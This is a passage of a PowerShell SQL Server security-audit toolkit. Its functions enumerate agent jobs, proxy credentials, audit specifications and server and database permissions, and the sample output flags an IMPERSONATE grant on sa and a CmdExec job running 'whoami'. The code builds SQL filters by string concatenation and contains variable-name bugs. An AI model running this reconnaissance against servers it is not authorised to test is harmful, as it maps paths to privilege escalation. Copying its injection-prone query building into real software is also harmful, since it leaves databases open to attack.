MSSQLSRV04\\SQLSERVER2016 : - 3 agent jobs found.\n            VERBOSE: 7 agents jobs were found in total.\n            VERBOSE: SQL Server Agent Job Search Complete.\n\n            Instance                               JOB_NAME                              step_name                             subsystem                             command                              \n            --------                               --------                              ---------                             ---------                             -------                              \n            MSSQLSRV04\\SQLSERVER2014               syspolicy_purge_history               Verify that automation is enabled.    TSQL                                  IF (msdb.dbo.fn_syspolicy_is_autom...\n            MSSQLSRV04\\SQLSERVER2014               syspolicy_purge_history               Purge history.                        TSQL                                  EXEC msdb.dbo.sp_syspolicy_purge_h...\n            MSSQLSRV04\\SQLSERVER2014               syspolicy_purge_history               Erase Phantom System Health Records.  PowerShell                            if ('$(ESCAPE_SQUOTE(INST))' -eq '...\n            MSSQLSRV04\\SQLSERVER2014               test                                  test1                                 CmdExec                               whoami                               \n            MSSQLSRV04\\SQLSERVER2016               syspolicy_purge_history               Verify that automation is enabled.    TSQL                                  IF (msdb.dbo.fn_syspolicy_is_autom...\n            MSSQLSRV04\\SQLSERVER2016               syspolicy_purge_history               Purge history.                        TSQL                                  EXEC msdb.dbo.sp_syspolicy_purge_h...\n            MSSQLSRV04\\SQLSERVER2016               syspolicy_purge_history               Erase Phantom System Health Records.  PowerShell                            if ('$(ESCAPE_SQUOTE(INST))' -eq '...\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Only return SQL Agent jobs for specific subsystems.')]\n         [ValidateSet(\"TSQL\",\"PowerShell\",\"CMDEXEC\",\"PowerShell\",\"ActiveScripting\",\"ANALYSISCOMMAND\",\"ANALYSISQUERY\",\"Snapshot\",\"Distribution\",\"LogReader\",\"Merge\",\"QueueReader\")]\n        [String]$SubSystem,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Only return SQL Agent jobs that have a command that includes a specific keyword.')]\n        [String]$Keyword,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Only return SQL Agent jobs using a proxy credentials.')]\n        [Switch]$UsingProxyCredential,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Only return SQL Agent jobs using a specific proxy credential.')]\n        [String]$ProxyCredential,\n        \n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Connect using Dedicated Admin Connection.')]\n        [Switch]$DAC,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Connection timeout.')]\n        [string]$TimeOut,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        Write-Verbose -Message \"SQL Server Agent Job Search Starting...\"\n\n        # Setup data table for output\n        $TblResults = New-Object -TypeName System.Data.DataTable\n        $null = $TblResults.Columns.Add('ComputerName')\n        $null = $TblResults.Columns.Add('Instance')     \n        $null = $TblResults.Columns.Add('DatabaseName')\n        $null = $TblResults.Columns.Add('Job_Id')                                                                                                                                                                                        \n        $null = $TblResults.Columns.Add('Job_Name')                                                                                                                                                                                                 \n        $null = $TblResults.Columns.Add('Job_Description')  \n        $null = $TblResults.Columns.Add('Job_Owner')\n        $null = $TblResults.Columns.Add('Proxy_Id')  \n        $null = $TblResults.Columns.Add('Proxy_Credential')                                                                                                                                                                                                          \n        $null = $TblResults.Columns.Add('Date_Created') \n        $null = $TblResults.Columns.Add('Last_Run_Date')\n        $null = $TblResults.Columns.Add('Enabled')                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         \n        $null = $TblResults.Columns.Add('Server')                                                                                                                                                                                        \n        $null = $TblResults.Columns.Add('Step_Name')\n        $null = $TblResults.Columns.Add('SubSystem')\n        $null = $TblResults.Columns.Add('Command')          \n        \n        # Setup SubSystem filter\n        if($SubSystem)\n        {\n            $SubSystemFilter = \" and steps.subsystem like '$SubSystem'\"\n        }\n        else\n        {\n            $SubSustemFilter = ''\n        }    \n        \n        # Setup Command Keyword filter\n        if($Keyword)\n        {\n            $KeywordFilter = \" and steps.command like '%$Keyword%'\"\n        }\n        else\n        {\n            $KeywordFilter = ''\n        }   \n\n        # Setup filter to only return jobs with proxy cred\n        if($UsingProxyCredential)\n        {\n            $UsingProxyCredFilter = \" and steps.proxy_id > 0\"\n        }\n        else\n        {\n            $UsingProxyCredFilter = ''\n        } \n        \n        # Setup filter to only return jobs with specific proxy cred\n        if($ProxyCredential)\n        {\n            $ProxyCredFilter = \" and proxies.name like '$ProxyCredential'\"\n        }\n        else\n        {\n            $ProxyCredFilter = ''\n        }                                                                                                                                                                                                 \n    }\n\n    Process\n    {\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Setup DAC string\n        if($DAC)\n        {\n            # Create connection object\n            $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut\n        }\n        else\n        {\n            # Create connection object\n            $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut\n        }\n\n        # Attempt connection\n        try\n        {\n            # Open connection\n            $Connection.Open()\n            if(-not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"                \n            }\n\n            # Get some information about current context\n            $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n            $CurrentLogin = $ServerInfo.CurrentLogin\n            $ComputerName = $ServerInfo.ComputerName\n            $Sysadmin = $ServerInfo.IsSysadmin\n\n            # Check if Agent Job service is running\n            $IsAgentServiceEnabled = Get-SQLQuery -Instance $Instance -Query \"SELECT 1 FROM sysprocesses WHERE LEFT(program_name, 8) = 'SQLAgent'\" -Username $Username -Password $Password -SuppressVerbose\n            if ($IsAgentServiceEnabled)\n            {\n                Write-Verbose -Message \"$Instance : - SQL Server Agent service enabled.\"\n            }\n            else\n            {\n                Write-Verbose -Message \"$Instance : - SQL Server Agent service has not been started.\"\n            }\n\n            # Get logins that have SQL Agent roles\n            # https://msdn.microsoft.com/en-us/library/ms188283.aspx\n            $AddJobPrivs = Get-SQLDatabaseRoleMember -Username $Username -Password $Password -Instance $Instance -DatabaseName msdb  -SuppressVerbose| ForEach-Object { \n                if($_.RolePrincipalName -match \"SQLAgentUserRole|SQLAgentReaderRole|SQLAgentOperatorRole\") {\n                    if ($_.PrincipalName -eq $CurrentLogin) { $_ }\n                }\n            }\n\n            if($AgentJobPrivs -or ($Sysadmin -eq \"Yes\"))\n            {\n                Write-Verbose -Message \"$Instance : - Attempting to list existing agent jobs as $CurrentLogin.\"\n\n\n                # Reference: https://msdn.microsoft.com/en-us/library/ms189817.aspx\n                $Query = \"SELECT \tsteps.database_name,\n\t                            job.job_id as [JOB_ID],\n\t                            job.name as [JOB_NAME],\n\t                            job.description as [JOB_DESCRIPTION],\n\t\t\t\t\t\t\t\tSUSER_SNAME(job.owner_sid) as [JOB_OWNER],\n\t\t\t\t\t\t\t\tsteps.proxy_id,\n\t\t\t\t\t\t\t\tproxies.name as [proxy_account],\n\t                            job.enabled,\n\t                            steps.server,\n\t                            job.date_created,   \n                                steps.last_run_date,\t\t\t\t\t\t\t\t                             \n\t\t\t\t\t\t\t\tsteps.step_name,\n\t\t\t\t\t\t\t\tsteps.subsystem,\n\t                            steps.command\n                            FROM [msdb].[dbo].[sysjobs] job\n                            INNER JOIN [msdb].[dbo].[sysjobsteps] steps        \n\t                            ON job.job_id = steps.job_id\n\t\t\t\t\t\t\tleft join [msdb].[dbo].[sysproxies] proxies\n\t\t\t\t\t\t\t on steps.proxy_id = proxies.proxy_id\n                            WHERE 1=1\n                            $KeywordFilter\n                            $SubSystemFilter\n                            $ProxyCredFilter\n                            $UsingProxyCredFilter\"\n\n                # Execute Query\n                $result = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose\n                \n                # Check the results                                \n                if(!($result)) {\n                    Write-Verbose -Message \"$Instance : - Either no jobs exist or the current login ($CurrentLogin) doesn't have the privileges to view them.\"\n                    return\n                }\n\n                # Get number of results\n                $AgentJobCount = $result.rows.count\n                Write-Verbose -Message \"$Instance : - $AgentJobCount agent jobs found.\"\n                \n\n                # Update data table\n                $result | \n                ForEach-Object{\n                    $null = $TblResults.Rows.Add($ComputerName,\n                    $Instance,\n                    $_.database_name,                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             \n                    $_.JOB_ID,                                                                                                                                                                                        \n                    $_.JOB_NAME, \n                    $_.JOB_DESCRIPTION,                                                                                                                                                                                                         \n                    $_.JOB_OWNER,\n                    $_.proxy_id,    \n                    $_.proxy_account, \n                    $_.date_created,\n                    $_.last_run_date,                                                                                                                                                                                  \n                    $_.enabled,                                                                                                                                                                                                     \n                    $_.server,                                                                                                                                                                                        \n                    $_.step_name,\n                    $_.subsystem,\n                    $_.command)\n                }\n            }\n            else\n            {\n                Write-Verbose -Message \"$Instance : - The current login ($CurrentLogin) does not have any agent privileges.\"\n                return\n            }\n\n            # Close connection\n            $Connection.Close()\n\n            # Dispose connection\n            $Connection.Dispose()\n\n        }\n        catch\n        {\n            # Connection failed\n            if(-not $SuppressVerbose)\n            {\n                $ErrorMessage = $_.Exception.Message\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n                #Write-Verbose  \" Error: $ErrorMessage\"\n            }\n        }        \n    }\n\n    End\n    {\n        Write-Verbose -Message \"SQL Server Agent Job Search Complete.\"\n\n        # Get total count of jobs\n        $TotalAgentCount = $TblResults.rows.Count\n\n        # Get subsystem summary data\n        $SummarySubSystem = $TblResults | Group-Object SubSystem | Select Name, Count | Sort-Object Count -Descending\n\n        # Get proxy summary data\n        $SummaryProxyAccount = $TblResults | Select-Object proxy_credential -Unique | Measure-Object | Select-Object Count -ExpandProperty Count\n\n        # Get system summary data\n        $SummaryServer = $TblResults | Select-Object ComputerName -Unique | Measure-Object |  Select-Object Count -ExpandProperty Count\n\n        # Get instance summary data\n        $SummaryInstance = $TblResults | Select-Object Instance -Unique | Measure-Object |  Select-Object Count -ExpandProperty Count\n\n        Write-Verbose -Message \"---------------------------------\"\n        Write-Verbose -Message \"Agent Job Summary\" \n        Write-Verbose -Message \"---------------------------------\"\n        Write-Verbose -Message \" $TotalAgentCount jobs found\"\n        Write-Verbose -Message \" $SummaryServer affected systems\"\n        Write-Verbose -Message \" $SummaryInstance affected SQL Server instances\"\n        Write-Verbose -Message \" $SummaryProxyAccount proxy credentials used\"\n\n        Write-Verbose -Message \"---------------------------------\"\n        Write-Verbose -Message \"Agent Job Summary by SubSystem\" \n        Write-Verbose -Message \"---------------------------------\"\n        $SummarySubSystem | \n        ForEach-Object {\n            $SubSystem_Name = $_.Name\n            $SubSystem_Count = $_.Count\n            Write-Verbose -Message \" $SubSystem_Count $SubSystem_Name Jobs\"\n        }\n        Write-Verbose -Message \" $TotalAgentCount Total\"\n        Write-Verbose -Message \"---------------------------------\"\n       \n\n        # Return data\n        $TblResults\n    }\n}\n\n# ----------------------------------\n#  Get-SQLAuditDatabaseSpec\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLAuditDatabaseSpec\n{\n    <#\n            .SYNOPSIS\n            Returns Audit database specifications from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DAC\n            Connect using Dedicated Admin Connection.\n            .PARAMETER AuditName\n            Audit name.\n            .PARAMETER AuditSpecification\n            Audit specification.\n            .PARAMETER AuditAction\n            Audit action name.\n            .EXAMPLE\n            PS C:\\> Get-SQLAuditDatabaseSpec -Verbose -Instance \"SQLServer1\"\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLAuditDatabaseSpec -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Audit name.')]\n        [string]$AuditName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Specification name.')]\n        [string]$AuditSpecification,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Audit action name.')]\n        [string]$AuditAction,\n\n\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblAuditDatabaseSpec = New-Object -TypeName System.Data.DataTable\n\n        # Setup audit name filter\n        if($AuditName)\n        {\n            $AuditNameFilter = \" and a.name like '%$AuditName%'\"\n        }\n        else\n        {\n            $AuditNameFilter = ''\n        }\n\n        # Setup spec name filter\n        if($AuditSpecification)\n        {\n            $SpecNameFilter = \" and s.name like '%$AuditSpecification%'\"\n        }\n        else\n        {\n            $SpecNameFilter = ''\n        }\n\n        # Setup action name filter\n        if($AuditAction)\n        {\n            $ActionNameFilter = \" and d.audit_action_name like '%$AuditAction%'\"\n        }\n        else\n        {\n            $ActionNameFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Note: Tables queried by this function typically require sysadmin privileges.\n\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n\n        # Define Query\n        $Query = \"  SELECT  '$ComputerName' as [ComputerName],\n            '$Instance' as [Instance],\n            audit_id as [AuditId],\n            a.name as [AuditName],\n            s.name as [AuditSpecification],\n            d.audit_action_id as [AuditActionId],\n            d.audit_action_name as [AuditAction],\n            s.is_state_enabled,\n            d.is_group,\n            s.create_date,\n            s.modify_date,\n            d.audited_result\n            FROM sys.server_audits AS a\n            JOIN sys.database_audit_specifications AS s\n            ON a.audit_guid = s.audit_guid\n            JOIN sys.database_audit_specification_details AS d\n            ON s.database_specification_id = d.database_specification_id WHERE 1=1\n            $AuditNameFilter\n            $SpecNameFilter\n        $ActionNameFilter\"\n\n        # Execute Query\n        $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose\n\n        # Append results\n        $TblAuditDatabaseSpec = $TblAuditDatabaseSpec + $TblResults\n    }\n\n    End\n    {\n        # Return data\n        $TblAuditDatabaseSpec\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLAuditServerSpec\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLAuditServerSpec\n{\n    <#\n            .SYNOPSIS\n            Returns Audit server specifications from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DAC\n            Connect using Dedicated Admin Connection.\n            .PARAMETER AuditName\n            Audit name.\n            .PARAMETER AuditSpecification\n            Audit specification.\n            .PARAMETER AuditAction\n            Audit action name.\n            .EXAMPLE\n            PS C:\\> Get-SQLAuditServerSpec -Verbose -Instance \"SQLServer1\"\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLAuditServerSpec -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Audit name.')]\n        [string]$AuditName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Specification name.')]\n        [string]$AuditSpecification,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Audit action name.')]\n        [string]$AuditAction,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblAuditServerSpec = New-Object -TypeName System.Data.DataTable\n\n        # Setup audit name filter\n        if($AuditName)\n        {\n            $AuditNameFilter = \" and a.name like '%$AuditName%'\"\n        }\n        else\n        {\n            $AuditNameFilter = ''\n        }\n\n        # Setup spec name filter\n        if($AuditSpecification)\n        {\n            $SpecNameFilter = \" and s.name like '%$AuditSpecification%'\"\n        }\n        else\n        {\n            $SpecNameFilter = ''\n        }\n\n        # Setup action name filter\n        if($AuditAction)\n        {\n            $ActionNameFilter = \" and d.audit_action_name like '%$AuditAction%'\"\n        }\n        else\n        {\n            $ActionNameFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Note: Tables queried by this function typically require sysadmin privileges.\n\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Define Query\n        $Query = \"  SELECT  '$ComputerName' as [ComputerName],\n            '$Instance' as [Instance],\n            audit_id as [AuditId],\n            a.name as [AuditName],\n            s.name as [AuditSpecification],\n            d.audit_action_name as [AuditAction],\n            s.is_state_enabled,\n            d.is_group,\n            d.audit_action_id as [AuditActionId],\n            s.create_date,\n            s.modify_date\n            FROM sys.server_audits AS a\n            JOIN sys.server_audit_specifications AS s\n            ON a.audit_guid = s.audit_guid\n            JOIN sys.server_audit_specification_details AS d\n            ON s.server_specification_id = d.server_specification_id WHERE 1=1\n            $AuditNameFilter\n            $SpecNameFilter\n        $ActionNameFilter\"\n\n        # Execute Query\n        $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose\n\n        # Append results\n        $TblAuditServerSpec  = $TblAuditServerSpec  + $TblResults\n    }\n\n    End\n    {\n        # Return data\n        $TblAuditServerSpec\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLServerPriv\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLServerPriv\n{\n    <#\n            .SYNOPSIS\n            Returns SQL Server login privilege information from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER PermissionName\n            Permission name to filter for.\n            .EXAMPLE\n            PS C:\\> Get-SQLServerPriv -Instance SQLServer1\\STANDARDDEV2014 -PermissionName IMPERSONATE\n\n            ComputerName    : SQLServer1\n            Instance        : SQLServer1\\STANDARDDEV2014\n            GranteeName     : public\n            GrantorName     : sa\n            PermissionClass : SERVER_PRINCIPAL\n            PermissionName  : IMPERSONATE\n            PermissionState : GRANT\n            ObjectName      : sa\n            ObjectType      : SQL_LOGIN\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLServerPriv -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Permission name.')]\n        [string]$PermissionName,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblServerPrivs = New-Object -TypeName System.Data.DataTable\n\n        # Setup $PermissionName filter\n        if($PermissionName)\n        {\n            $PermissionNameFilter = \" WHERE PER.permission_name like '$PermissionName'\"\n        }\n        else\n        {\n            $PermissionNameFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Note: Tables queried by this function typically require sysadmin privileges to get all rows.\n\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Define Query\n        $Query = \"  SELECT  '$ComputerName' as [ComputerName],\n            '$Instance' as [Instance],\n            GRE.name as [GranteeName],\n            GRO.name as [GrantorName],\n            PER.class_desc as [PermissionClass],\n            PER.permission_name as [PermissionName],\n            PER.state_desc as [PermissionState],\n            COALESCE(PRC.name, EP.name, N'') as [ObjectName],\n            COALESCE(PRC.type_desc, EP.type_desc, N'') as [ObjectType]\n            FROM [sys].[server_permissions] as PER\n            INNER JOIN sys.server_principals as GRO\n            ON PER.grantor_principal_id = GRO.principal_id\n            INNER JOIN sys.server_principals as GRE\n            ON PER.grantee_principal_id = GRE.principal_id\n            LEFT JOIN sys.server_principals as PRC\n            ON PER.class = 101 AND PER.major_id = PRC.principal_id\n            LEFT JOIN sys.endpoints AS EP\n            ON PER.class = 105 AND PER.major_id = EP.endpoint_id\n            $PermissionNameFilter\n        ORDER BY GranteeName,PermissionName;\"\n\n        # Execute Query\n        $TblServerPrivsTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n        # Append data as needed\n        $TblServerPrivs = $TblServerPrivs + $TblServerPrivsTemp\n    }\n\n    End\n    {\n        # Return data\n        $TblServerPrivs\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLDatabasePriv\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLDatabasePriv\n{\n    <#\n            .SYNOPSIS\n            Returns database user privilege information from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DAC\n            Connect using Dedicated Admin Connection.\n            .PARAMETER DatabaseName\n            Database name to filter for.\n            .PARAMETER NoDefaults\n            Only select non default databases.\n            .PARAMETER PermissionName\n            Permission name to filter for.\n            .PARAMETER PermissionType\n            Permission type name to filter for.\n            .PARAMETER PrincipalName\n            Principal name to filter for.\n            .EXAMPLE\n            PS C:\\> Get-SQLDatabasePriv -Instance SQLServer1\\STANDARDDEV2014 -DatabaseName testdb -PermissionName \"VIEW DEFINITION\"\n\n            ComputerName     : SQLServer1\n            Instance         : SQLServer1\\STANDARDDEV2014\n            DatabaseName     : testdb\n            PrincipalName    : createprocuser\n            PrincipalType    : SQL_USER\n            PermissionType   : SCHEMA\n            PermissionName   : VIEW DEFINITION\n            StateDescription : GRANT\n            ObjectType       : SCHEMA\n            ObjectName       : dbo\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLDatabasePriv -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server database name to filter for.')]\n        [string]$DatabaseName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Permission name to filter for.')]\n        [string]$PermissionName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Permission type to filter for.')]\n        [string]$PermissionType,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Principal name for grantee to filter for.')]\n        [string]$PrincipalName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = \"Don't select permissions for default databases.\")]\n        [switch]$NoDefaults,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblDatabasePrivs = New-Object -TypeName System.Data.DataTable\n\n        # Setup PermissionName filter\n        if($PermissionName)\n        {\n            $PermissionNameFilter = \" and pm.permission_name like '$PermissionName'\"\n        }\n        else\n        {\n            $PermissionNameFilter = ''\n        }\n\n        # Setup PermissionName filter\n        if($PrincipalName)\n        {\n            $PrincipalNameFilter = \" and rp.name like '$PrincipalName'\"\n        }\n        else\n        {\n            $PrincipalNameFilter = ''\n        }\n\n        # Setup PermissionType filter\n        if($PermissionType)\n        {\n            $PermissionTypeFilter = \" and pm.class_desc like '$PermissionType'\"\n        }\n        else\n        {\n            $PermissionTypeFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Note: Tables queried by this function typically require sysadmin privileges.\n\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Setup NoDefault filter\n        if($NoDefaults)\n        {\n            # Get list of databases\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose\n        }\n        else\n        {\n            # Get list of databases\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose\n        }\n\n        # Get the privs for each database\n        $TblDatabases |\n        ForEach-Object -Process {\n            # Set DatabaseName filter\n            $DbName = $_.DatabaseName\n\n            # Define Query\n            $Query = \"  